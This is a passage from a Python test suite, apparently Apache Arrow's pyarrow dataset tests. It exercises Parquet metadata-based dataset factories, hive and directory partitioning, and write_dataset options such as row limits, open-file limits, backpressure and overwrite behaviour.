table = pa.table({'f1': [0] * 10, 'f2': np.random.randn(10)})
metadata_collector = []
pq.write_to_dataset(
table, str(root_path), metadata_collector=metadata_collector,
use_legacy_dataset=use_legacy_dataset
)
metadata_path = str(root_path / '_metadata')
# write _metadata file
pq.write_metadata(
table.schema, metadata_path,
metadata_collector=metadata_collector
)
dataset = ds.parquet_dataset(metadata_path)
assert dataset.schema.equals(table.schema)
result = dataset.to_table()
assert result.num_rows == 10
@pytest.mark.parquet
def test_parquet_dataset_factory_order(tempdir):
# The order of the fragments in the dataset should match the order of the
# row groups in the _metadata file.
metadatas = []
# Create a dataset where f1 is incrementing from 0 to 100 spread across
# 10 files. Put the row groups in the correct order in _metadata
for i in range(10):
table = pa.table(
{'f1': list(range(i*10, (i+1)*10))})
table_path = tempdir / f'{i}.parquet'
pq.write_table(table, table_path, metadata_collector=metadatas)
metadatas[-1].set_file_path(f'{i}.parquet')
metadata_path = str(tempdir / '_metadata')
pq.write_metadata(table.schema, metadata_path, metadatas)
dataset = ds.parquet_dataset(metadata_path)
# Ensure the table contains values from 0-100 in the right order
scanned_table = dataset.to_table()
scanned_col = scanned_table.column('f1').to_pylist()
assert scanned_col == list(range(0, 100))
@pytest.mark.parquet
@pytest.mark.pandas
def test_parquet_dataset_factory_invalid(tempdir):
root_path = tempdir / "test_parquet_dataset_invalid"
metadata_path, table = _create_parquet_dataset_simple(root_path)
# remove one of the files
list(root_path.glob("*.parquet"))[0].unlink()
dataset = ds.parquet_dataset(metadata_path)
assert dataset.schema.equals(table.schema)
assert len(dataset.files) == 4
with pytest.raises(FileNotFoundError):
dataset.to_table()
def _create_metadata_file(root_path):
# create _metadata file from existing parquet dataset
parquet_paths = list(sorted(root_path.rglob("*.parquet")))
schema = pq.ParquetFile(parquet_paths[0]).schema.to_arrow_schema()
metadata_collector = []
for path in parquet_paths:
metadata = pq.ParquetFile(path).metadata
metadata.set_file_path(str(path.relative_to(root_path)))
metadata_collector.append(metadata)
metadata_path = root_path / "_metadata"
pq.write_metadata(
schema, metadata_path, metadata_collector=metadata_collector
)
return metadata_path
def _create_parquet_dataset_partitioned(root_path):
table = pa.table([
pa.array(range(20)), pa.array(np.random.randn(20)),
pa.array(np.repeat(['a', 'b'], 10))],
names=["f1", "f2", "part"]
)
table = table.replace_schema_metadata({"key": "value"})
pq.write_to_dataset(table, str(root_path), partition_cols=['part'])
return _create_metadata_file(root_path), table
@pytest.mark.parquet
@pytest.mark.pandas
def test_parquet_dataset_factory_partitioned(tempdir):
root_path = tempdir / "test_parquet_dataset_factory_partitioned"
metadata_path, table = _create_parquet_dataset_partitioned(root_path)
partitioning = ds.partitioning(flavor="hive")
dataset = ds.parquet_dataset(metadata_path, partitioning=partitioning)
assert dataset.schema.equals(table.schema)
assert len(dataset.files) == 2
result = dataset.to_table()
assert result.num_rows == 20
# the partitioned dataset does not preserve order
result = result.to_pandas().sort_values("f1").reset_index(drop=True)
expected = table.to_pandas()
pd.testing.assert_frame_equal(result, expected)
@pytest.mark.parquet
@pytest.mark.pandas
def test_parquet_dataset_factory_metadata(tempdir):
# ensure ParquetDatasetFactory preserves metadata (ARROW-9363)
root_path = tempdir / "test_parquet_dataset_factory_metadata"
metadata_path, table = _create_parquet_dataset_partitioned(root_path)
dataset = ds.parquet_dataset(metadata_path, partitioning="hive")
assert dataset.schema.equals(table.schema)
assert b"key" in dataset.schema.metadata
fragments = list(dataset.get_fragments())
assert b"key" in fragments[0].physical_schema.metadata
@pytest.mark.parquet
@pytest.mark.pandas
def test_parquet_dataset_lazy_filtering(tempdir, open_logging_fs):
fs, assert_opens = open_logging_fs
# Test to ensure that no IO happens when filtering a dataset
# created with ParquetDatasetFactory from a _metadata file
root_path = tempdir / "test_parquet_dataset_lazy_filtering"
metadata_path, _ = _create_parquet_dataset_simple(root_path)
# creating the dataset should only open the metadata file
with assert_opens([metadata_path]):
dataset = ds.parquet_dataset(
metadata_path,
partitioning=ds.partitioning(flavor="hive"),
filesystem=fs)
# materializing fragments should not open any file
with assert_opens([]):
fragments = list(dataset.get_fragments())
# filtering fragments should not open any file
with assert_opens([]):
list(dataset.get_fragments(ds.field("f1") > 15))
# splitting by row group should still not open any file
with assert_opens([]):
fragments[0].split_by_row_group(ds.field("f1") > 15)
# ensuring metadata of split fragment should also not open any file
with assert_opens([]):
rg_fragments = fragments[0].split_by_row_group()
rg_fragments[0].ensure_complete_metadata()
# FIXME(bkietz) on Windows this results in FileNotFoundErrors.
# but actually scanning does open files
# with assert_opens([f.path for f in fragments]):
# dataset.to_table()
@pytest.mark.parquet
@pytest.mark.pandas
def test_dataset_schema_metadata(tempdir, dataset_reader):
# ARROW-8802
df = pd.DataFrame({'a': [1, 2, 3]})
path = tempdir / "test.parquet"
df.to_parquet(path)
dataset = ds.dataset(path)
schema = dataset_reader.to_table(dataset).schema
projected_schema = dataset_reader.to_table(dataset, columns=["a"]).schema
# ensure the pandas metadata is included in the schema
assert b"pandas" in schema.metadata
# ensure it is still there in a projected schema (with column selection)
assert schema.equals(projected_schema, check_metadata=True)
@pytest.mark.parquet
def test_filter_mismatching_schema(tempdir, dataset_reader):
# ARROW-9146
table = pa.table({"col": pa.array([1, 2, 3, 4], type='int32')})
pq.write_table(table, str(tempdir / "data.parquet"))
# specifying explicit schema, but that mismatches the schema of the data
schema = pa.schema([("col", pa.int64())])
dataset = ds.dataset(
tempdir / "data.parquet", format="parquet", schema=schema)
# filtering on a column with such type mismatch should implicitly
# cast the column
filtered = dataset_reader.to_table(dataset, filter=ds.field("col") > 2)
assert filtered["col"].equals(table["col"].cast('int64').slice(2))
fragment = list(dataset.get_fragments())[0]
filtered = dataset_reader.to_table(
fragment, filter=ds.field("col") > 2, schema=schema)
assert filtered["col"].equals(table["col"].cast('int64').slice(2))
@pytest.mark.parquet
@pytest.mark.pandas
def test_dataset_project_only_partition_columns(tempdir, dataset_reader):
# ARROW-8729
table = pa.table({'part': 'a a b b'.split(), 'col': list(range(4))})
path = str(tempdir / 'test_dataset')
pq.write_to_dataset(table, path, partition_cols=['part'])
dataset = ds.dataset(path, partitioning='hive')
all_cols = dataset_reader.to_table(dataset)
part_only = dataset_reader.to_table(dataset, columns=['part'])
assert all_cols.column('part').equals(part_only.column('part'))
@pytest.mark.parquet
@pytest.mark.pandas
def test_dataset_project_null_column(tempdir, dataset_reader):
import pandas as pd
df = pd.DataFrame({"col": np.array([None, None, None], dtype='object')})
f = tempdir / "test_dataset_project_null_column.parquet"
df.to_parquet(f, engine="pyarrow")
dataset = ds.dataset(f, format="parquet",
schema=pa.schema([("col", pa.int64())]))
expected = pa.table({'col': pa.array([None, None, None], pa.int64())})
assert dataset_reader.to_table(dataset).equals(expected)
def test_dataset_project_columns(tempdir, dataset_reader):
# basic column re-projection with expressions
from pyarrow import feather
table = pa.table({"A": [1, 2, 3], "B": [1., 2., 3.], "C": ["a", "b", "c"]})
feather.write_feather(table, tempdir / "data.feather")
dataset = ds.dataset(tempdir / "data.feather", format="feather")
result = dataset_reader.to_table(dataset, columns={
'A_renamed': ds.field('A'),
'B_as_int': ds.field('B').cast("int32", safe=False),
'C_is_a': ds.field('C') == 'a'
})
expected = pa.table({
"A_renamed": [1, 2, 3],
"B_as_int": pa.array([1, 2, 3], type="int32"),
"C_is_a": [True, False, False],
})
assert result.equals(expected)
# raise proper error when not passing an expression
with pytest.raises(TypeError, match="Expected an Expression"):
dataset_reader.to_table(dataset, columns={"A": "A"})
@pytest.mark.pandas
@pytest.mark.parquet
def test_dataset_preserved_partitioning(tempdir):
# ARROW-8655
# through discovery, but without partitioning
_, path = _create_single_file(tempdir)
dataset = ds.dataset(path)
assert dataset.partitioning is None
# through discovery, with hive partitioning but not specified
full_table, path = _create_partitioned_dataset(tempdir)
dataset = ds.dataset(path)
assert dataset.partitioning is None
# through discovery, with hive partitioning (from a partitioning factory)
dataset = ds.dataset(path, partitioning="hive")
part = dataset.partitioning
assert part is not None
assert isinstance(part, ds.HivePartitioning)
assert part.schema == pa.schema([("part", pa.int32())])
assert len(part.dictionaries) == 1
assert part.dictionaries[0] == pa.array([0, 1, 2], pa.int32())
# through discovery, with hive partitioning (from a partitioning object)
part = ds.partitioning(pa.schema([("part", pa.int32())]), flavor="hive")
assert isinstance(part, ds.HivePartitioning) # not a factory
assert len(part.dictionaries) == 1
assert all(x is None for x in part.dictionaries)
dataset = ds.dataset(path, partitioning=part)
part = dataset.partitioning
assert isinstance(part, ds.HivePartitioning)
assert part.schema == pa.schema([("part", pa.int32())])
# TODO is this expected?
assert len(part.dictionaries) == 1
assert all(x is None for x in part.dictionaries)
# through manual creation -> not available
dataset = ds.dataset(path, partitioning="hive")
dataset2 = ds.FileSystemDataset(
list(dataset.get_fragments()), schema=dataset.schema,
format=dataset.format, filesystem=dataset.filesystem
)
assert dataset2.partitioning is None
# through discovery with ParquetDatasetFactory
root_path = tempdir / "data-partitioned-metadata"
metadata_path, _ = _create_parquet_dataset_partitioned(root_path)
dataset = ds.parquet_dataset(metadata_path, partitioning="hive")
part = dataset.partitioning
assert part is not None
assert isinstance(part, ds.HivePartitioning)
assert part.schema == pa.schema([("part", pa.string())])
assert len(part.dictionaries) == 1
# will be fixed by ARROW-13153 (order is not preserved at the moment)
# assert part.dictionaries[0] == pa.array(["a", "b"], pa.string())
assert set(part.dictionaries[0].to_pylist()) == {"a", "b"}
@pytest.mark.parquet
@pytest.mark.pandas
def test_write_to_dataset_given_null_just_works(tempdir):
schema = pa.schema([
pa.field('col', pa.int64()),
pa.field('part', pa.dictionary(pa.int32(), pa.string()))
])
table = pa.table({'part': [None, None, 'a', 'a'],
'col': list(range(4))}, schema=schema)
path = str(tempdir / 'test_dataset')
pq.write_to_dataset(table, path, partition_cols=[
'part'], use_legacy_dataset=False)
actual_table = pq.read_table(tempdir / 'test_dataset')
# column.equals can handle the difference in chunking but not the fact
# that `part` will have different dictionaries for the two chunks
assert actual_table.column('part').to_pylist(
) == table.column('part').to_pylist()
assert actual_table.column('col').equals(table.column('col'))
@pytest.mark.parquet
@pytest.mark.pandas
@pytest.mark.filterwarnings(
"ignore:Passing 'use_legacy_dataset=True':FutureWarning")
def test_legacy_write_to_dataset_drops_null(tempdir):
schema = pa.schema([
pa.field('col', pa.int64()),
pa.field('part', pa.dictionary(pa.int32(), pa.string()))
])
table = pa.table({'part': ['a', 'a', None, None],
'col': list(range(4))}, schema=schema)
expected = pa.table(
{'part': ['a', 'a'], 'col': list(range(2))}, schema=schema)
path = str(tempdir / 'test_dataset')
pq.write_to_dataset(table, path, partition_cols=[
'part'], use_legacy_dataset=True)
actual = pq.read_table(tempdir / 'test_dataset')
assert actual == expected
def _sort_table(tab, sort_col):
import pyarrow.compute as pc
sorted_indices = pc.sort_indices(
tab, options=pc.SortOptions([(sort_col, 'ascending')]))
return pc.take(tab, sorted_indices)
def _check_dataset_roundtrip(dataset, base_dir, expected_files, sort_col,
base_dir_path=None, partitioning=None):
base_dir_path = base_dir_path or base_dir
ds.write_dataset(dataset, base_dir, format="arrow",
partitioning=partitioning, use_threads=False)
# check that all files are present
file_paths = list(base_dir_path.rglob("*"))
assert set(file_paths) == set(expected_files)
# check that reading back in as dataset gives the same result
dataset2 = ds.dataset(
base_dir_path, format="arrow", partitioning=partitioning)
assert _sort_table(dataset2.to_table(), sort_col).equals(
_sort_table(dataset.to_table(), sort_col))
@pytest.mark.parquet
def test_write_dataset(tempdir):
# manually create a written dataset and read as dataset object
directory = tempdir / 'single-file'
directory.mkdir()
_ = _create_single_file(directory)
dataset = ds.dataset(directory)
# full string path
target = tempdir / 'single-file-target'
expected_files = [target / "part-0.arrow"]
_check_dataset_roundtrip(dataset, str(target), expected_files, 'a', target)
# pathlib path object
target = tempdir / 'single-file-target2'
expected_files = [target / "part-0.arrow"]
_check_dataset_roundtrip(dataset, target, expected_files, 'a', target)
# TODO
# # relative path
# target = tempdir / 'single-file-target3'
# expected_files = [target / "part-0.ipc"]
# _check_dataset_roundtrip(
# dataset, './single-file-target3', expected_files, target)
# Directory of files
directory = tempdir / 'single-directory'
directory.mkdir()
_ = _create_directory_of_files(directory)
dataset = ds.dataset(directory)
target = tempdir / 'single-directory-target'
expected_files = [target / "part-0.arrow"]
_check_dataset_roundtrip(dataset, str(target), expected_files, 'a', target)
@pytest.mark.parquet
@pytest.mark.pandas
def test_write_dataset_partitioned(tempdir):
directory = tempdir / "partitioned"
_ = _create_parquet_dataset_partitioned(directory)
partitioning = ds.partitioning(flavor="hive")
dataset = ds.dataset(directory, partitioning=partitioning)
# hive partitioning
target = tempdir / 'partitioned-hive-target'
expected_paths = [
target / "part=a", target / "part=a" / "part-0.arrow",
target / "part=b", target / "part=b" / "part-0.arrow"
]
partitioning_schema = ds.partitioning(
pa.schema([("part", pa.string())]), flavor="hive")
_check_dataset_roundtrip(
dataset, str(target), expected_paths, 'f1', target,
partitioning=partitioning_schema)
# directory partitioning
target = tempdir / 'partitioned-dir-target'
expected_paths = [
target / "a", target / "a" / "part-0.arrow",
target / "b", target / "b" / "part-0.arrow"
]
partitioning_schema = ds.partitioning(
pa.schema([("part", pa.string())]))
_check_dataset_roundtrip(
dataset, str(target), expected_paths, 'f1', target,
partitioning=partitioning_schema)
def test_write_dataset_with_field_names(tempdir):
table = pa.table({'a': ['x', 'y', None], 'b': ['x', 'y', 'z']})
ds.write_dataset(table, tempdir, format='ipc',
partitioning=["b"])
load_back = ds.dataset(tempdir, format='ipc', partitioning=["b"])
files = load_back.files
partitioning_dirs = {
str(pathlib.Path(f).relative_to(tempdir).parent) for f in files
}
assert partitioning_dirs == {"x", "y", "z"}
load_back_table = load_back.to_table()
assert load_back_table.equals(table)
def test_write_dataset_with_field_names_hive(tempdir):
table = pa.table({'a': ['x', 'y', None], 'b': ['x', 'y', 'z']})
ds.write_dataset(table, tempdir, format='ipc',
partitioning=["b"], partitioning_flavor="hive")
load_back = ds.dataset(tempdir, format='ipc', partitioning="hive")
files = load_back.files
partitioning_dirs = {
str(pathlib.Path(f).relative_to(tempdir).parent) for f in files
}
assert partitioning_dirs == {"b=x", "b=y", "b=z"}
load_back_table = load_back.to_table()
assert load_back_table.equals(table)
def test_write_dataset_with_scanner(tempdir):
table = pa.table({'a': ['x', 'y', None], 'b': ['x', 'y', 'z'],
'c': [1, 2, 3]})
ds.write_dataset(table, tempdir, format='ipc',
partitioning=["b"])
dataset = ds.dataset(tempdir, format='ipc', partitioning=["b"])
with tempfile.TemporaryDirectory() as tempdir2:
ds.write_dataset(dataset.scanner(columns=["b", "c"]),
tempdir2, format='ipc', partitioning=["b"])
load_back = ds.dataset(tempdir2, format='ipc', partitioning=["b"])
load_back_table = load_back.to_table()
assert dict(load_back_table.to_pydict()
) == table.drop(["a"]).to_pydict()
@pytest.mark.parquet
def test_write_dataset_with_backpressure(tempdir):
consumer_gate = threading.Event()
# A filesystem that blocks all writes so that we can build
# up backpressure. The writes are released at the end of
# the test.
class GatingFs(ProxyHandler):
def open_output_stream(self, path, metadata):
# Block until the end of the test
consumer_gate.wait()
return self._fs.open_output_stream(path, metadata=metadata)
gating_fs = fs.PyFileSystem(GatingFs(fs.LocalFileSystem()))
schema = pa.schema([pa.field('data', pa.int32())])
# The scanner should queue ~ 8Mi rows (~8 batches) but due to ARROW-16258
# it always queues 32 batches.
batch = pa.record_batch([pa.array(list(range(1_000_000)))], schema=schema)
batches_read = 0
min_backpressure = 32
end = 200
keep_going = True
def counting_generator():
nonlocal batches_read
while batches_read < end:
if not keep_going:
return
time.sleep(0.01)
batches_read += 1
yield batch
scanner = ds.Scanner.from_batches(
counting_generator(), schema=schema, use_threads=True)
write_thread = threading.Thread(
target=lambda: ds.write_dataset(
scanner, str(tempdir), format='parquet', filesystem=gating_fs))
write_thread.start()
try:
start = time.time()
def duration():
return time.time() - start
# This test is timing dependent. There is no signal from the C++
# when backpressure has been hit. We don't know exactly when
# backpressure will be hit because it may take some time for the
# signal to get from the sink to the scanner.
#
# The test may emit false positives on slow systems. It could
# theoretically emit a false negative if the scanner managed to read
# and emit all 200 batches before the backpressure signal had a chance
# to propagate but the 0.01s delay in the generator should make that
# scenario unlikely.
last_value = 0
backpressure_probably_hit = False
while duration() < 10:
if batches_read > min_backpressure:
if batches_read == last_value:
backpressure_probably_hit = True
break
last_value = batches_read
time.sleep(0.5)
assert backpressure_probably_hit
finally:
# If any batches remain to be generated go ahead and
# skip them
keep_going = False
consumer_gate.set()
write_thread.join()
def test_write_dataset_with_dataset(tempdir):
table = pa.table({'b': ['x', 'y', 'z'], 'c': [1, 2, 3]})
ds.write_dataset(table, tempdir, format='ipc',
partitioning=["b"])
dataset = ds.dataset(tempdir, format='ipc', partitioning=["b"])
with tempfile.TemporaryDirectory() as tempdir2:
ds.write_dataset(dataset, tempdir2,
format='ipc', partitioning=["b"])
load_back = ds.dataset(tempdir2, format='ipc', partitioning=["b"])
load_back_table = load_back.to_table()
assert dict(load_back_table.to_pydict()) == table.to_pydict()
@pytest.mark.pandas
def test_write_dataset_existing_data(tempdir):
directory = tempdir / 'ds'
table = pa.table({'b': ['x', 'y', 'z'], 'c': [1, 2, 3]})
partitioning = ds.partitioning(schema=pa.schema(
[pa.field('c', pa.int64())]), flavor='hive')
def compare_tables_ignoring_order(t1, t2):
df1 = t1.to_pandas().sort_values('b').reset_index(drop=True)
df2 = t2.to_pandas().sort_values('b').reset_index(drop=True)
assert df1.equals(df2)
# First write is ok
ds.write_dataset(table, directory, partitioning=partitioning, format='ipc')
table = pa.table({'b': ['a', 'b', 'c'], 'c': [2, 3, 4]})
# Second write should fail
with pytest.raises(pa.ArrowInvalid):
ds.write_dataset(table, directory,
partitioning=partitioning, format='ipc')
extra_table = pa.table({'b': ['e']})
extra_file = directory / 'c=2' / 'foo.arrow'
pyarrow.feather.write_feather(extra_table, extra_file)
# Should be ok and overwrite with overwrite behavior
ds.write_dataset(table, directory, partitioning=partitioning,
format='ipc',
existing_data_behavior='overwrite_or_ignore')
overwritten = pa.table(
{'b': ['e', 'x', 'a', 'b', 'c'], 'c': [2, 1, 2, 3, 4]})
readback = ds.dataset(tempdir, format='ipc',
partitioning=partitioning).to_table()
compare_tables_ignoring_order(readback, overwritten)
assert extra_file.exists()
# Should be ok and delete matching with delete_matching
ds.write_dataset(table, directory, partitioning=partitioning,
format='ipc', existing_data_behavior='delete_matching')
overwritten = pa.table({'b': ['x', 'a', 'b', 'c'], 'c': [1, 2, 3, 4]})
readback = ds.dataset(tempdir, format='ipc',
partitioning=partitioning).to_table()
compare_tables_ignoring_order(readback, overwritten)
assert not extra_file.exists()
def _generate_random_int_array(size=4, min=1, max=10):
return np.random.randint(min, max, size)
def _generate_data_and_columns(num_of_columns, num_of_records):
data = []
column_names = []
for i in range(num_of_columns):
data.append(_generate_random_int_array(size=num_of_records,
min=1,
max=num_of_records))
column_names.append("c" + str(i))
record_batch = pa.record_batch(data=data, names=column_names)
return record_batch
def _get_num_of_files_generated(base_directory, file_format):
return len(list(pathlib.Path(base_directory).glob(f'**/*.{file_format}')))
@pytest.mark.parquet
def test_write_dataset_max_rows_per_file(tempdir):
directory = tempdir / 'ds'
max_rows_per_file = 10
max_rows_per_group = 10
num_of_columns = 2
num_of_records = 35
record_batch = _generate_data_and_columns(num_of_columns,
num_of_records)
ds.write_dataset(record_batch, directory, format="parquet",
max_rows_per_file=max_rows_per_file,
max_rows_per_group=max_rows_per_group)
files_in_dir = os.listdir(directory)
# number of partitions with max_rows and the partition with the remainder
expected_partitions = num_of_records // max_rows_per_file + 1
# test whether the expected amount of files are written
assert len(files_in_dir) == expected_partitions
# compute the number of rows per each file written
result_row_combination = []
for _, f_file in enumerate(files_in_dir):
f_path = directory / str(f_file)
dataset = ds.dataset(f_path, format="parquet")
result_row_combination.append(dataset.to_table().shape[0])
# test whether the generated files have the expected number of rows
assert expected_partitions == len(result_row_combination)
assert num_of_records == sum(result_row_combination)
assert all(file_rowcount <= max_rows_per_file
for file_rowcount in result_row_combination)
@pytest.mark.parquet
def test_write_dataset_min_rows_per_group(tempdir):
directory = tempdir / 'ds'
min_rows_per_group = 6
max_rows_per_group = 8
num_of_columns = 2
record_sizes = [5, 5, 5, 5, 5, 4, 4, 4, 4, 4]
record_batches = [_generate_data_and_columns(num_of_columns,
num_of_records)
for num_of_records in record_sizes]
data_source = directory / "min_rows_group"
ds.write_dataset(data=record_batches, base_dir=data_source,
min_rows_per_group=min_rows_per_group,
max_rows_per_group=max_rows_per_group,
format="parquet")
files_in_dir = os.listdir(data_source)
for _, f_file in enumerate(files_in_dir):
f_path = data_source / str(f_file)
dataset = ds.dataset(f_path, format="parquet")
table = dataset.to_table()
batches = table.to_batches()
for id, batch in enumerate(batches):
rows_per_batch = batch.num_rows
if id < len(batches) - 1:
assert rows_per_batch >= min_rows_per_group and \
rows_per_batch <= max_rows_per_group
else:
assert rows_per_batch <= max_rows_per_group
@pytest.mark.parquet
def test_write_dataset_max_rows_per_group(tempdir):
directory = tempdir / 'ds'
max_rows_per_group = 18
num_of_columns = 2
num_of_records = 30
record_batch = _generate_data_and_columns(num_of_columns,
num_of_records)
data_source = directory / "max_rows_group"
ds.write_dataset(data=record_batch, base_dir=data_source,
max_rows_per_group=max_rows_per_group,
format="parquet")
files_in_dir = os.listdir(data_source)
batched_data = []
for f_file in files_in_dir:
f_path = data_source / str(f_file)
dataset = ds.dataset(f_path, format="parquet")
table = dataset.to_table()
batches = table.to_batches()
for batch in batches:
batched_data.append(batch.num_rows)
assert batched_data == [18, 12]
@pytest.mark.parquet
def test_write_dataset_max_open_files(tempdir):
directory = tempdir / 'ds'
file_format = "parquet"
partition_column_id = 1
column_names = ['c1', 'c2']
record_batch_1 = pa.record_batch(data=[[1, 2, 3, 4, 0, 10],
['a', 'b', 'c', 'd', 'e', 'a']],
names=column_names)
record_batch_2 = pa.record_batch(data=[[5, 6, 7, 8, 0, 1],
['a', 'b', 'c', 'd', 'e', 'c']],
names=column_names)
record_batch_3 = pa.record_batch(data=[[9, 10, 11, 12, 0, 1],
['a', 'b', 'c', 'd', 'e', 'd']],
names=column_names)
record_batch_4 = pa.record_batch(data=[[13, 14, 15, 16, 0, 1],
['a', 'b', 'c', 'd', 'e', 'b']],
names=column_names)
table = pa.Table.from_batches([record_batch_1, record_batch_2,
record_batch_3, record_batch_4])
partitioning = ds.partitioning(
pa.schema([(column_names[partition_column_id], pa.string())]),
flavor="hive")
data_source_1 = directory / "default"
ds.write_dataset(data=table, base_dir=data_source_1,
partitioning=partitioning, format=file_format)
# Here we consider the number of unique partitions created when
# partitioning column contains duplicate records.
# Returns: (number_of_files_generated, number_of_partitions)
def _get_compare_pair(data_source, record_batch, file_format, col_id):
num_of_files_generated = _get_num_of_files_generated(
base_directory=data_source, file_format=file_format)
number_of_partitions = len(pa.compute.unique(record_batch[col_id]))
return num_of_files_generated, number_of_partitions
# CASE 1: when max_open_files=default & max_open_files >= num_of_partitions
# In case of a writing to disk via partitioning based on a
# particular column (considering row labels in that column),
# the number of unique rows must be equal
# to the number of files generated
num_of_files_generated, number_of_partitions \
= _get_compare_pair(data_source_1, record_batch_1, file_format,
partition_column_id)
assert num_of_files_generated == number_of_partitions
# CASE 2: when max_open_files > 0 & max_open_files < num_of_partitions
# the number of files generated must be greater than the number of
# partitions
data_source_2 = directory / "max_1"
max_open_files = 3
ds.write_dataset(data=table, base_dir=data_source_2,
partitioning=partitioning, format=file_format,
max_open_files=max_open_files, use_threads=False)
num_of_files_generated, number_of_partitions \
= _get_compare_pair(data_source_2, record_batch_1, file_format,
partition_column_id)
assert num_of_files_generated > number_of_partitions
@pytest.mark.parquet
@pytest.mark.pandas
def test_write_dataset_partitioned_dict(tempdir):
directory = tempdir / "partitioned"
_ = _create_parquet_dataset_partitioned(directory)
# directory partitioning, dictionary partition columns
dataset = ds.dataset(
directory,
partitioning=ds.HivePartitioning.discover(infer_dictionary=True))
target = tempdir / 'partitioned-dir-target'
expected_paths = [
target / "a", target / "a" / "part-0.arrow",
target / "b", target / "b" / "part-0.arrow"
]
partitioning = ds.partitioning(pa.schema([
dataset.schema.field('part')]),
dictionaries={'part': pa.array(['a', 'b'])})
# NB: dictionaries required here since we use partitioning to parse
# directories in _check_dataset_roundtrip (not currently required for
# the formatting step)
_check_dataset_roundtrip(
dataset, str(target), expected_paths, 'f1', target,
partitioning=partitioning)
@pytest.mark.parquet
@pytest.mark.pandas
def test_write_dataset_use_threads(tempdir):
directory = tempdir / "partitioned"
_ = _create_parquet_dataset_partitioned(directory)
dataset = ds.dataset(directory, partitioning="hive")
partitioning = ds.partitioning(
pa.schema([("part", pa.string())]), flavor="hive")
target1 = tempdir / 'partitioned1'
paths_written = []
def file_visitor(written_file):
paths_written.append(written_file.path)
ds.write_dataset(
dataset, target1, format="feather", partitioning=partitioning,
use_threads=True, file_visitor=file_visitor
)
expected_paths = {
target1 / 'part=a' / 'part-0.feather',
target1 / 'part=b' / 'part-0.feather'
}
paths_written_set = set(map(pathlib.Path, paths_written))
assert paths_written_set == expected_paths
target2 = tempdir / 'partitioned2'
ds.write_dataset(
dataset, target2, format="feather", partitioning=partitioning,
use_threads=False
)
# check that reading in gives same result
result1 = ds.dataset(target1, format="feather", partitioning=partitioning)
result2 = ds.dataset(target2, format="feather", partitioning=partitioning)
assert result1.to_table().equals(result2.to_table())
def test_write_table(tempdir):
table = pa.table([
pa.array(range(20)), pa.array(np.random.randn(20)),
pa.array(np.repeat(['a', 'b'], 10))
], names=["f1", "f2", "part"])
base_dir = tempdir / 'single'
ds.write_dataset(table, base_dir,
basename_template='dat_{i}.arrow', format="feather")
# check that all files are present
file_paths = list(base_dir.rglob("*"))
expected_paths = [base_dir / "dat_0.arrow"]
assert set(file_paths) == set(expected_paths)
# check Table roundtrip
result = ds.dataset(base_dir, format="ipc").to_table()
assert result.equals(table)
# with partitioning
base_dir = tempdir / 'partitioned'
expected_paths = [
base_dir / "part=a", base_dir / "part=a" / "dat_0.arrow",
base_dir / "part=b", base_dir / "part=b" / "dat_0.arrow"
]
visited_paths = []
visited_sizes = []
def file_visitor(written_file):
visited_paths.append(written_file.path)
visited_sizes.append(written_file.size)
partitioning = ds.partitioning(
pa.schema([("part", pa.string())]), flavor="hive")
ds.write_dataset(table, base_dir, format="feather",
basename_template='dat_{i}.arrow',
partitioning=partitioning, file_visitor=file_visitor)
file_paths = list(base_dir.rglob("*"))
assert set(file_paths) == set(expected_paths)
actual_sizes = [os.path.getsize(path) for path in visited_paths]
assert visited_sizes == actual_sizes
result = ds.dataset(base_dir, format="ipc", partitioning=partitioning)
assert result.to_table().equals(table)
assert len(visited_paths) == 2
for visited_path in visited_paths:
assert pathlib.Path(visited_path) in expected_paths
def test_write_table_multiple_fragments(tempdir):
table = pa.table([
pa.array(range(10)), pa.array(np.random.randn(10)),
pa.array(np.repeat(['a', 'b'], 5))
], names=["f1", "f2", "part"])
table = pa.concat_tables([table]*2)
# Table with multiple batches written as single Fragment by default
base_dir = tempdir / 'single'
ds.write_dataset(table, base_dir, format="feather")
assert set(base_dir.rglob("*")) == set([base_dir / "part-0.feather"])
assert ds.dataset(base_dir, format="ipc").to_table().equals(table)
# Same for single-element list of Table
base_dir = tempdir / 'single-list'
ds.write_dataset([table], base_dir, format="feather")
assert set(base_dir.rglob("*")) == set([base_dir / "part-0.feather"])
assert ds.dataset(base_dir, format="ipc").to_table().equals(table)
# Provide list of batches to write multiple fragments
base_dir = tempdir / 'multiple'
ds.write_dataset(table.to_batches(), base_dir, format="feather")
assert set(base_dir.rglob("*")) == set(
[base_dir / "part-0.feather"])
assert ds.dataset(base_dir, format="ipc").to_table().equals(table)
# Provide list of tables to write multiple fragments
base_dir = tempdir / 'multiple-table'
ds.write_dataset([table, table], base_dir, format="feather")
assert set(base_dir.rglob("*")) == set(
[base_dir / "part-0.feather"])
assert ds.dataset(base_dir, format="ipc").to_table().equals(
pa.concat_tables([table]*2)
)
def test_write_iterable(tempdir):
table = pa.table([
pa.array(range(20)), pa.array(np.random.randn(20)),
pa.array(np.repeat(['a', 'b'], 10))
], names=["f1", "f2", "part"])
base_dir = tempdir / 'inmemory_iterable'
ds.write_dataset((batch for batch in table.to_batches()), base_dir,
schema=table.schema,
basename_template='dat_{i}.arrow', format="feather")
result = ds.dataset(base_dir, format="ipc").to_table()
assert result.equals(table)
base_dir = tempdir / 'inmemory_reader'
reader = pa.RecordBatchReader.from_batches(table.schema,
table.to_batches())
ds.write_dataset(reader, base_dir,
basename_template='dat_{i}.arrow', format="feather")
result = ds.dataset(base_dir, format="ipc").to_table()
assert result.equals(table)
def test_write_scanner(tempdir, dataset_reader):
table = pa.table([
pa.array(range(20)), pa.array(np.random.randn(20)),
pa.array(np.repeat(['a', 'b'], 10))
], names=["f1", "f2", "part"])
dataset = ds.dataset(table)
base_dir = tempdir / 'dataset_from_scanner'
ds.write_dataset(dataset_reader.scanner(
dataset), base_dir, format="feather")
result = dataset_reader.to_table(ds.dataset(base_dir, format="ipc"))
assert result.equals(table)
# scanner with different projected_schema
base_dir = tempdir / 'dataset_from_scanner2'
ds.write_dataset(dataset_reader.scanner(dataset, columns=["f1"]),
base_dir, format="feather")
result = dataset_reader.to_table(ds.dataset(base_dir, format="ipc"))
assert result.equals(table.select(["f1"]))
# schema not allowed when writing a scanner
with pytest.raises(ValueError, match="Cannot specify a schema"):
ds.write_dataset(dataset_reader.scanner(dataset), base_dir,
schema=table.schema, format="feather")
def test_write_table_partitioned_dict(tempdir):
# ensure writing table partitioned on a dictionary column works without
# specifying the dictionary values explicitly
table = pa.table([
pa.array(range(20)),
pa.array(np.repeat(['a', 'b'], 10)).dictionary_encode(),
], names=['col', 'part'])
partitioning = ds.partitioning(table.select(["part"]).schema)
base_dir = tempdir / "dataset"
